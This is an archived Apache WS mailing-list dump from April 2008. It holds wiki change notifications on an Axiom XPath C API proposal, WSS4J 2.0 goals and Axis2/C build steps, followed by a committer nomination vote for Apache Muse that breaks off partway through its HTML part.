(qpsmtpd/0.29) with ESMTP; Tue, 08 Apr 2008 23:49:47 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 06:49:12 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 96454D2D3 for <[email protected]>; Wed, 9 Apr 2008 06:49:25 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 09 Apr 2008 06:49:25 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "ode/monitoring management console" by milinda X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by milinda: http://wiki.apache.org/ws/ode/monitoring_management_console ------------------------------------------------------------------------------ - =Apache ODE Management and Monitoring Console Design= + Apache ODE Management and Monitoring Console Design --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Apr 14 15:28:53 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14294 invoked from network); 14 Apr 2008 15:28:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Apr 2008 15:28:48 -0000 Received: (qmail 3815 invoked by uid 500); 14 Apr 2008 15:28:47 -0000 Delivered-To: [email protected] Received: (qmail 3441 invoked by uid 500); 14 Apr 2008 15:28:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 3423 invoked by uid 99); 14 Apr 2008 15:28:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 Apr 2008 08:28:46 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 Apr 2008 15:28:01 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 6A22AD2D5 for <[email protected]>; Mon, 14 Apr 2008 15:28:14 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Mon, 14 Apr 2008 15:28:14 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "axiom-xpath-api-gsoc-varuna" by VarunaJayasiri X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by VarunaJayasiri: http://wiki.apache.org/ws/axiom-xpath-api-gsoc-varuna ------------------------------------------------------------------------------ - == Axiom XPath API == + = Axiom XPath API = - This is not intended to be a comprehensive API documentation, but an overview of proposed API for Google Summer of Code project. + ==== Compile XPath Expression ==== + {{{ + axiom_xpath_expression_t* axiom_xpath_compile_expression(const axutil_env_t *env, const axis2_char_t* xpath_expr) + }}} + Creates a axiom_xpath_expression by parsing xpath_expr. All parse errors will be handled by this function. All parse errors will be logged if necessary. + ''Example:'' - == Functions == - - ==== axiom_xpath_expression_t* axiom_xpath_create_expression(const axutil_env_t *env, const axis2_char_t* xpath_expr) ==== - Creates a axiom_xpath_expression by parsing xpath_expr. All parse errors will be handled by this function. All parse errors will be logged if necessary. - ===== Example: ===== {{{ - axiom_xpath_expression_t *exp = axiom_xpath_create_expression(env, "/father/son"); + axiom_xpath_expression_t *exp = axiom_xpath_compile_expression(env, "/father/son"); }}} + ==== Create XPath Context ==== - ==== axiom_xpath_namespace_list* axiom_xpath_create_namespace_list(const axutil_env_t *env) ==== - Creates an empty axiom_xpath_namespace_list. This will be used to register namespaces. - ===== Example: ===== {{{ - axiom_xpath_namespace_list *namespaces = axiom_xpath_create_namespace_list(env); + axiom_xpath_context_t* axiom_xpath_context_create(const axutil_env_t *env, const axiom_node_t * root_node) + }}} + Creates a XPath context for the root node. + + ==== Register Namespaces ==== + {{{ + void axiom_xpath_register_namespaces(axiom_xpath_context_t *context, const axis2_char_t* prefix, const axis2_char_t* uri) + }}} + Adds namespace to list of namespaces. + + ''Example:'' + {{{ + axiom_xpath_register_namespace(context, "red", "http://www.xvpj.net/red"); }}} + ==== Evaluate XPath Query ==== - ==== void axiom_xpath_register_namespace(const axutil_env_t *env, axiom_xpath_namespace_list * namespaces, const axis2_char_t* prefix, const axis2_char_t* uri) ==== - Adds an namespace to list of namespaces. - ===== Examplacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b ===== {{{ - axiom_xpath_register_namespace(env, namespaces, "red", "http://www.xvpj.net/red"); + axiom_xpath_result_t* axiom_xpath_evaluate(axiom_xpath_context_t *context, const axiom_xpath_expression_t * xpath_expr) }}} + Evaluates the xpath expression and return the results. + ''Example:'' - ==== axiom_xpath_result_t* axiom_xpath_evaluate(const axutil_env_t *env, const axiom_node_t * root_node, const axiom_xpath_expression_t * xpath_expr, const axiom_xpath_namespace_list * namespaces = NULL) ==== - Evaluates the xpath expression and return the results. - ===== Examplacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b ===== {{{ axiom_xpath_result_t* result = axiom_xpath_select_nodes(env, root, exp); }}} - ---- - ''It is also possible to use a xpath context (as in libxml xpath module) where the context is initialized with the root node and then namespaces are registered'' - ==== axiom_xpath_result_type_t axiom_xpath_get_result_type(axiom_xpath_result_t * result) ==== - Gets the type of result obtained by evaluating the xpath expression. This could be a string, number, boolean, node or a list of nodes. + ==== XPath Result ==== + {{{ + struct axiom_xpath_result + { + int size; // Number of nodes in the result set + int flag; // For error messages, etc + axiom_xpath_result_node_t * nodes; + } + }}} - ==== axiom_node_t* axiom_xpath_get_node(axiom_xpath_result_t * result) ==== - Returns the axiom node in the result. If the type of result is not node, NULL will be returned. + {{{ + struct axiom_xpath_result_node + { + axiom_xpath_result_type type; + void * value; + } + }}} - ===== Other functions to process results ===== - Other functions to process the results will have a similar interface + ==== Casting ==== + {{{ + axis2_char_t * axiom_xpath_cast_node2string(axiom_xpath_result_node_t * node) + }}} + The cast depends on the type of the node This could be a string, number, boolean, or a node. + If it is a string, it would be simply returned. + If it is a number or a boolean it will be converted to a string. + If it is a axiom node, the node and it's content will be returned as a string. + {{{ + int axiom_xpath_cast_node2boolean(axiom_xpath_result_node_t * node) + }}} + If the result is boolean it will be returned. + Otherwise true will be returned if the result is not empty. + + {{{ + double axiom_xpath_cast_node2number(axiom_xpath_result_node_t * node) + }}} + If the result is a numebr it will be returned. + If the result is boolean, 1 will be returned if true, 0 otherwise. + 0 will be returned if the result type is string or axiom node. + + {{{ + axiom_node_t * axiom_xpath_cast_node2axiom_node(axiom_xpath_result_node_t * node) + }}} + If the result type is node it will be casted and returned; otherwise, NULL will be returned. + + ==== Freeing Memory ==== + + {{{ + void axiom_xpath_free_context(axiom_xpath_context_t *context) + }}} + Frees the xpath context + + {{{ + void axiom_xpath_free_expression(axiom_xpath_expression_t * xpath_expr) + }}} + Frees the xpath expression + + {{{ + void axiom_xpath_free_result(axiom_xpath_result_t* result) + }}} + Frees the xpath result set. If result set contains axiom nodes they will not be freed as they are just pointers to the nodes in the XML tree. + --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 16 07:47:16 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28341 invoked from network); 16 Apr 2008 07:47:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Apr 2008 07:47:12 -0000 Received: (qmail 30960 invoked by uid 500); 16 Apr 2008 07:47:12 -0000 Delivered-To: [email protected] Received: (qmail 30319 invoked by uid 500); 16 Apr 2008 07:47:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 30308 invoked by uid 99); 16 Apr 2008 07:47:09 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 00:47:09 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 07:46:35 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 66E09D2EA for <[email protected]>; Wed, 16 Apr 2008 07:46:48 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 16 Apr 2008 07:46:48 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/WsFx" by werner X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by werner: http://wiki.apache.org/ws/FrontPage/WsFx ------------------------------------------------------------------------------ = Implementing WS-* on top of Axis2 = 1. [wiki:/wsfx-axis2 Requirements] + = Proposals and discussions for WSS4J 2.0 = + 1. [wiki:/wss4jNear Near term goals] + 1. [wiki:/wss4jLonger Long(er) term goals] + --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 16 07:48:45 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30312 invoked from network); 16 Apr 2008 07:48:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Apr 2008 07:48:41 -0000 Received: (qmail 32335 invoked by uid 500); 16 Apr 2008 07:48:42 -0000 Delivered-To: [email protected] Received: (qmail 31801 invoked by uid 500); 16 Apr 2008 07:48:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 31780 invoked by uid 99); 16 Apr 2008 07:48:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 00:48:40 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 07:47:56 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id E7662D2EA for <[email protected]>; Wed, 16 Apr 2008 07:48:16 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 16 Apr 2008 07:48:16 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/WsFx" by werner X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by werner: http://wiki.apache.org/ws/FrontPage/WsFx ------------------------------------------------------------------------------ 1. [wiki:/secureconv Interop] 1. [wiki:/secureconvmatrix Matrix] - = Sandesha (WS-ReliableMessaging) = + == Sandesha (WS-ReliableMessaging) == 1. [wiki:/sandeshafaq Sandesha FAQ] - = Implementing WS-* on top of Axis2 = + == Implementing WS-* on top of Axis2 == 1. [wiki:/wsfx-axis2 Requirements] - = Proposals and discussions for WSS4J 2.0 = + == Proposals and discussions for WSS4J 2.0 == 1. [wiki:/wss4jNear Near term goals] 1. [wiki:/wss4jLonger Long(er) term goals] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 16 08:14:07 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46025 invoked from network); 16 Apr 2008 08:14:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Apr 2008 08:14:03 -0000 Received: (qmail 69592 invoked by uid 500); 16 Apr 2008 08:14:00 -0000 Delivered-To: [email protected] Received: (qmail 69137 invoked by uid 500); 16 Apr 2008 08:13:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 69126 invoked by uid 99); 16 Apr 2008 08:13:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 01:13:59 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 08:13:23 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id BEB1BD2D5 for <[email protected]>; Wed, 16 Apr 2008 08:13:36 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 16 Apr 2008 08:13:36 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/WsFx/wss4jNear" by werner X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by werner: http://wiki.apache.org/ws/FrontPage/WsFx/wss4jNear New page: = Proposals and Discussions for WSS4J 2.0 = In this article we list and discuss new near-term features and enhancements for WSS4J 2.0. The structure of this article is similiar to the WSS4J FAQ: each feature gets a name, an entry in the table of contents, and a detailed description followed by the discussion. Each detailed description and discussion entry shall bear the author's name. 1. [#mavenize Mavenize the build/test/deploy/release cycle] 1. [#checkstyle Checkstyle/pmd the source tree] 1. [#split Split the build into fewer components] 1. [#port Port to Java 5] 1. [#osgi OSGI bundling] [[Anchor(mavenize)]] ==== Mavenize the build/test/deploy/release cycle ==== Author: Fred (Fred Dushin) Use Maven (Maven 2) to build, test, deploy, and release WSS4J 2.0. [[Anchor(checkstyle)]] ==== Checkstyle/pmd the source tree ==== Author: Fred (Fred Dushin) Fred, please give a short description of the tasks to do, for example: * remove deprecated methosds * don't use/call deprecated methods and classes [[Anchor(split)]] ==== Split the build into fewer components ==== Author: Fred (Fred Dushin) Reduce number of main components. Proposal: core, handler, and axis [[Anchor(port)]] ==== Port to Java 5 ==== Author: Fred (Fred Dushin) using Java 5 language features: this might be a problem for some users [[Anchor(osgi)]] ==== OSGI bundling ==== Author: Fred (Fred Dushin) Fred, can you provide some details here? --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 16 08:17:29 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48519 invoked from network); 16 Apr 2008 08:17:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Apr 2008 08:17:28 -0000 Received: (qmail 74962 invoked by uid 500); 16 Apr 2008 08:17:27 -0000 Delivered-To: [email protected] Received: (qmail 74525 invoked by uid 500); 16 Apr 2008 08:17:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 74514 invoked by uid 99); 16 Apr 2008 08:17:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 01:17:25 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 08:16:51 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id E5582D2D5 for <[email protected]>; Wed, 16 Apr 2008 08:17:03 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 16 Apr 2008 08:17:03 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/WsFx/wss4jNear" by werner X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by werner: http://wiki.apache.org/ws/FrontPage/WsFx/wss4jNear ------------------------------------------------------------------------------ - = Proposals and Discussions for WSS4J 2.0 = + = Near Term Goals = In this article we list and discuss new near-term features and enhancements for WSS4J 2.0. The structure of this article is similiar to the WSS4J FAQ: each feature gets a name, an --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 16 08:35:55 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58894 invoked from network); 16 Apr 2008 08:35:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Apr 2008 08:35:51 -0000 Received: (qmail 3362 invoked by uid 500); 16 Apr 2008 08:35:51 -0000 Delivered-To: [email protected] Received: (qmail 2828 invoked by uid 500); 16 Apr 2008 08:35:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 2817 invoked by uid 99); 16 Apr 2008 08:35:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 01:35:50 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Apr 2008 08:35:06 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 89E5CD2D5 for <[email protected]>; Wed, 16 Apr 2008 08:35:26 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 16 Apr 2008 08:35:26 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/WsFx/wss4jLonger" by werner X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by werner: http://wiki.apache.org/ws/FrontPage/WsFx/wss4jLonger New page: = Long(er) term goals = n this article we list and discuss new log-term features and enhancements or those features or enhancements that need more discussion, thorough design, or synhcronisation with associated project. The structure of this article is similiar to the WSS4J FAQ: each feature gets a name, an entry in the table of contents, and a detailed description followed by the discussion. Each detailed description and discussion entry shall bear the author's name. 1. [#api Consider enhancements to the APIs] 1. [#jaxb Support JAX-B generated types from WS-Security schema] 1. [#dom Study feasibility of signature/encr without need for DOM (stax?)] 1. [#wspolicy Use WS-SecurityPolicy as a configuration API?] 1. [#jceprovider Plugable JCE providers] 1. [#callback Provide generic callback mechanism to support clients] [[Anchor(api)]] ==== Consider enhancements to the APIs ==== Author: Fred (Fred Dushin) Some description here. [[Anchor(jaxb)]] ==== Support JAX-B generated types from WS-Security schema ==== Author: Fred (Fred Dushin) Some description here. [[Anchor(dom)]] ==== Study feasibility of signature/encr without need for DOM (stax?) ==== Author: Fred (Fred Dushin) Some description here. [[Anchor(wspolicy)]] ==== Use WS-SecurityPolicy as a configuration API? ==== Author: Fred (Fred Dushin) Some description here. [[Anchor(jceprovider)]] ==== Plugable JCE providers ==== Author: ?? Use other JCE providers than BC [[Anchor(callback)]] ==== Provide generic callback mechanism to support clients ==== Author: George (George Stanchev), Fred ''George:'' Here is the use case - I have build a WS-Trust client and in some cases I need to be able to refer from the body of the message to security tokens genarated by wss4j (for example X509 certs in signature, username tokens, etc). The particular case I have is the wst:On``Behalf``Of element which can either contain the token or have a wss:Security``Token``Reference pointing to the wsu:Id of the token. I think wss4j should provide a way to either use pre-generated pool of wsu:Ids for identifying wss nodes or has a callback may be that allows the client to supply wsu:Id at process time. ''Fred:'' I've been trying to think about a callback mechanism on the processing side, as well. I see we've gotten a few requests for being able to track the data that's been signed or encrypted, and I think using callbacks gives the user a lot more flexibility than by providing data structures, after an event has occurred. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Apr 18 11:55:57 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93919 invoked from network); 18 Apr 2008 11:55:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Apr 2008 11:55:53 -0000 Received: (qmail 36039 invoked by uid 500); 18 Apr 2008 11:55:51 -0000 Delivered-To: [email protected] Received: (qmail 35435 invoked by uid 500); 18 Apr 2008 11:55:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 35424 invoked by uid 99); 18 Apr 2008 11:55:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Apr 2008 04:55:49 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Apr 2008 11:55:14 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 44DC2D2D5 for <[email protected]>; Fri, 18 Apr 2008 11:55:27 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Fri, 18 Apr 2008 11:55:27 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/Axis2C/releases/steps" by DineshPremalal X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by DineshPremalal: http://wiki.apache.org/ws/FrontPage/Axis2C/releases/steps ------------------------------------------------------------------------------ scp axis2c_1.2.0.tar.gz [email protected]:~/ }}} + === Building Windows Binary === + * ENABLE_GUTHTHILA = 1 + * CRUNTIME = /MT + * EMBED_MANIFEST = 0 + * DEBUG = 0 + --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Apr 21 19:29:32 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70906 invoked from network); 21 Apr 2008 19:29:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Apr 2008 19:29:29 -0000 Received: (qmail 80543 invoked by uid 500); 21 Apr 2008 19:29:29 -0000 Delivered-To: [email protected] Received: (qmail 80015 invoked by uid 500); 21 Apr 2008 19:29:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 79984 invoked by uid 99); 21 Apr 2008 19:29:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 12:29:27 -0700 X-ASF-Spam-Status: No, hits=-2.0 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO e31.co.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 19:28:33 +0000 Received: from d03relay04.boulder.ibm.com (d03relay04.boulder.ibm.com [161.129.204.104]) by e31.co.us.ibm.com (8.13.8/8.13.8) with ESMTP id m3LJSrCq013456; Mon, 21 Apr 2008 15:28:53 -0400 Received: from d03av05.boulder.ibm.com (d03av05.boulder.ibm.com [161.129.204.104]) by d03relay04.boulder.ibm.com (8.13.8/8.13.8/NCO v8.7) with ESMTP id m3LJSqXB192166; Mon, 21 Apr 2008 13:28:52 -0600 Received: from d03av05.boulder.ibm.com (loopback [161.129.204.104]) by d03av05.boulder.ibm.com (8.13.1/8.13.3) with ESMTP id m3LJSqQL019518; Mon, 21 Apr 2008 13:28:52 -0600 Received: from d03nm118.boulder.ibm.com (d03nm118.boulder.ibm.com [161.129.204.104]) by d03av05.boulder.ibm.com (8.13.1/8.12.11) with ESMTP id m3LJSqpF019501; Mon, 21 Apr 2008 13:28:52 -0600 Subject: [VOTE] new committers To: [email protected], [email protected] Cc: [email protected] X-Mailer: Lotus Notes Release 7.0 HF277 June 21, 2006 Message-ID: <[email protected]> From: Daniel Jemiolo <[email protected]> Date: Mon, 21 Apr 2008 15:28:50 -0400 X-MIMETrack: Serialize by Router on D03NM118/03/M/IBM(Release 8.0|August 02, 2007) at 04/21/2008 13:28:51 MIME-Version: 1.0 Content-type: multipart/alternative; Boundary="0__=08BBFEA1DFDA50738f9e8a93df938690918c08BBFEA1DFDA5073" Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org --0__=08BBFEA1DFDA50738f9e8a93df938690918c08BBFEA1DFDA5073 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: quoted-printable Lately there has been a lot of talk on the Muse mailing list about pull= ing all of contributions from the last year together and creating a 2.3 release. Of course, it won't be as simple as that: there are lots of ne= w features and plenty of important bug fixes based on real world experien= ce with the code, but unfortunately, the current committers have been pull= ed away to other projects. I think that it's time to nominate some new committers, people who have shown that they can maintain and grow the M= use code base through their code contributions and time volunteered helping= others on the mailing list. Below is the list of people that I am nominating to take on the responsibility of shaping, testing, and delivering Muse 2.3.0; they wil= l be joined by existing committers Vinh Nguyen (Cisco) and Joel Hawkins (Compuware). Saurabh Dravid - Saurabh initially worked on the Eclipse TPTP project, building Eclipse tooling for Muse users. Much of his bug reporting (and= solving) is split between Apache and Eclipse bug trackers, but together= these two sources show that he is very comfortable getting knee deep in= the code and solving problems. With that knowledge under his belt, Saurabh = is now contributing new features around security and resource discovery, things that are crucial to deployers and could not be completed without= lots of intense study and determination. Balan Subramanian - Everything I said about Saurabh can be applied equa= lly to Balan. Balan has also spent years handling the legal and administrat= ive issues surrounding open source development with Apache and Eclipse (fro= m a corporate perspective), and is well-suited to review new contributions = and ensure that due diligence is in place for all of them; the 2.3 contributions come from sources that are more disparate than ever, so t= his skill and patience is important. Chris Twiner - Chris Twiner is a 'real world' user of Muse who has foun= d and cracked many tough problems in the code base. In my personal opinio= n, his contributions on MUSE-270[1] alone are enough to warrant nomination= , but his involvement is not limited to this. In addition to being a significant code contributor, Chris is an active mailing list problem solver who often has insight that the original developers could not hav= e had when they first wrote the code; he has also shown the tact and resourcefulness that I think is required to balance the needs of new us= ers with the desire of developers to move forward. Kam Yee - Kam has made strong contributions in an area that is extremel= y important but often overlooked because of its difficulty: he has create= d a test harness for Muse FVT and SVT, including WS-* spec compliance. This= is something that we've wanted for a very long time, but the complexity of= WS-* deployment and testing has pushed it to the bottom of the list. I think Kam's work will be key to ensuring that we don't have regressions= in spec compliance or in the tedious-but-important WSDL/SOAP/codegen issue= s that we face all the time. Committers and PMC members: please reply to muse-dev and general with y= our votes. You can either send one vote for all or vote for each individual= separately. Here is my +1 for all four nominees. Thanks, Dan [1] http://issues.apache.org/jira/browse/MUSE-270= --0__=08BBFEA1DFDA50738f9e8a93df938690918c08BBFEA1DFDA5073 Content-type: text/html; charset=US-ASCII Content-Disposition: inline Content-transfer-encoding: quoted-printable <html><body> <p>Lately there has been a lot of talk on the Muse mailing list about p= ulling all of contributions from the last year together and creating a = 2.3 release. Of course, it won't be as simple as that: there are lots o= f new features and plenty of important bug fixes based on real world ex= perience with the 